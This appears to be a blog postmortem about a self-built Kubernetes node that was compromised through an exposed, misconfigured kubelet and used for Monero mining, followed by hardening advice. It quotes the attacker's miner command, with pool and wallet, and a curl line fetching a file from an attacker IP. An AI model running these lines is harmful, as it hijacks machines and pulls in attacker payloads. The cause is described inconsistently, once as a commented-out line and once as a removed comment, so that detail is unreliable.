How a Misconfigured Kubelet Led to Crypto Mining on Our Kubernetes Node – Lessons Learned

Recently we encountered a case where a machine in our self‑built Kubernetes cluster was compromised and used for cryptocurrency mining. The intrusion was identified by an abnormal process.

Network security is a serious issue that often appears unnoticed until it is too late. This article shares the investigation and hardening steps to help readers secure their clusters.

Invasion Phenomenon

We found an abnormal process on a node:

./.system -o pool.supportxmr.com:3333 --donate-level=1 --coin=monero -u 46EPFzvnX5GH61ejkPpNcRNm8kVjs8oHS9VwCkKRCrJX27XEW2y1NPLfSa54DGHxqnKfzDUVW1jzBfekk3hrCVCm
curl -s http://45.9.148.35/scan_threads.dat

In short, our machine was being used for mining.

After the issue appeared, we immediately stopped Docker, but the proper approach is to isolate the environment and dump the mining program for further analysis.

Root Cause Investigation

① iptables empty

The node had no iptables rules, meaning it was exposed without a firewall.

② kubelet exposed

Colleagues suspected the kubelet component. After checking other components, we focused on kubelet.

③ kubelet misconfiguration

The kubelet parameters allowed direct access to its API. A commented‑out line in the startup configuration prevented the anonymous‑access restriction from being applied.

The misconfiguration was caused by an accidental comment removal.

Since the problematic node was newly added, we quickly identified the cause and verified that other nodes did not have the same issue.

Improvement Plan

Machine firewall settings : Even if firewall synchronization fails, do not open all ports; default to closed and only open ports after administrator verification.

Public IP usage : Avoid exposing machines with public IPs unless necessary; the compromised node was scanned within a day of deployment.

Kubelet and service listening : Bind services to internal IPs instead of 0.0.0.0 to limit exposure.

Anonymous access control : Evaluate the risks of anonymous access and implement authentication if it must be disabled.

Administrator operations : Adopt scripted, repeatable procedures for production changes to reduce manual error.

These strategies aim to strengthen security from the network perimeter to internal service configurations.

Conclusion

The intrusion gave the attacker full control over Docker on the compromised node. It serves as a reminder that network security must start with firewall hardening and careful port management to prevent similar incidents.